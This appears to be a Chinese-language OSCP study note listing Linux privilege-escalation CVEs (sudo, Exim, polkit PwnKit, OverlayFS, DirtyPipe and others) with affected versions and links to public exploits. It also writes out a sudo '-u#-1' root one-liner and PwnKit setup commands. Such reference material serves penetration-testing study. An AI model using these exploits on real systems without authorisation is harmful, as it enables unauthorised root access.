2-内核提权+big cve 对照表 - My-oscp-all-things

### CVE 2015-5602 sudoedit #### 影响版本 ![](Pasted%20image%2020220126123259.png) ### CVE-2016-1531 #### 影响版本 ``` exim version < 4.84-3 local root exploit ``` poc:[exploits/cve-2016-1531.sh at master · hackerhouse-opensource/exploits · GitHub](https://github.com/hackerhouse-opensource/exploits/blob/master/cve-2016-1531.sh) ### CVE-2017-16995 #### 影响版本 ``` ubuntu ker 4.14~4.4 ``` poc:[exploits/cve-2017-16995.c at master · rlarabee/exploits · GitHub](https://github.com/rlarabee/exploits/blob/master/cve-2017-16995/cve-2017-16995.c) ### CVE2019-14287 sudo !root #### check ``` cat /etc/sudoers | grep "(\s*ALL\s*,\s*\!root\s*)" cat /etc/sudoers | grep "(\s*ALL\s*,\s*\!#0\s*)" ``` poc: ``` sudo -u#-1 bash ``` ### CVE2021-4034 polkit提权 #### 影响版本 ``` 不受影响的范围 CentOS： CentOS 6：polkit-0.96-11.el6_10.2 CentOS 7：polkit-0.112-26.el7_9.1 CentOS 8.0：polkit-0.115-13.el8_5.1 CentOS 8.2：polkit-0.115-11.el8_2.2 CentOS 8.4：polkit-0.115-11.el8_4.2** Ubuntu： Ubuntu 14.04 ESM：policykit-1-0.105-4ubuntu3.14.04.6+esm1 Ubuntu 16.04 ESM：policykit-1-0.105-14.1ubuntu0.5+esm1 Ubuntu 18.04 LTS：policykit-1-0.105-20ubuntu0.18.04.6 Ubuntu 20.04 LTS：policykit-1-0.105-26ubuntu1.2 Ubuntu 21.10：policykit-1-0.105-31ubuntu0.1 Debain： policykit-1 0.105-18+deb9u2 Debain stretch：policykit-1 0.105-18+deb9u2 Debain buster：policykit-1 0.105-25+deb10u1 Debain bullseye：policykit-1 0.105-31+deb11u1 Debain bookworm,bullseye：policykit-1 0.105-31.1 ``` #polkit ``` https://github.com/ghostaatrox/pkexec-CVE-2021-4034 echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules mkdir -p GCONV_PATH=. cp /bin/true GCONV_PATH=./pwnkit.so:. cp /usr/bin/true GCONV_PATH=./pwnkit.so:. ``` poc:[GitHub - berdav/CVE-2021-4034: CVE-2021-4034 1day](https://github.com/berdav/CVE-2021-4034) ### CVE2021-3156 sudo提权 #### 影响版本: ``` sudo version 1.8.2-1.8.31sp12 1.9.0-1.9.5sp1 sudo >=1.9.5sp2 ``` poc:[GitHub - worawit/CVE-2021-3156: Sudo Baron Samedit Exploit](https://github.com/worawit/CVE-2021-3156) ### CVE-2021-3493 #### 影响版本 ``` Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM ``` poc:[GitHub - briskets/CVE-2021-3493: Ubuntu OverlayFS Local Privesc](https://github.com/briskets/CVE-2021-3493.git) ### CVE-2021-33909 #### 影响版本 ``` Ubuntu 20.04、Ubuntu 20.10、Ubuntu 21.04、Debian 11 和 Fedora 34 Workstation ``` poc : [GitHub - Liang2580/CVE-2021-33909: Sequoia exploit (7/20/21)](https://github.com/Liang2580/CVE-2021-33909) ### CVE-2022-0847 DirtyPipe #### 影响版本 ``` Linux Kernel 5.8 < 5.16.11 ``` poc:[Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe) - Linux local Exploit](https://www.exploit-db.com/exploits/50808) [https://haxx.in/files/dirtypipez.c](https://haxx.in/files/dirtypipez.c)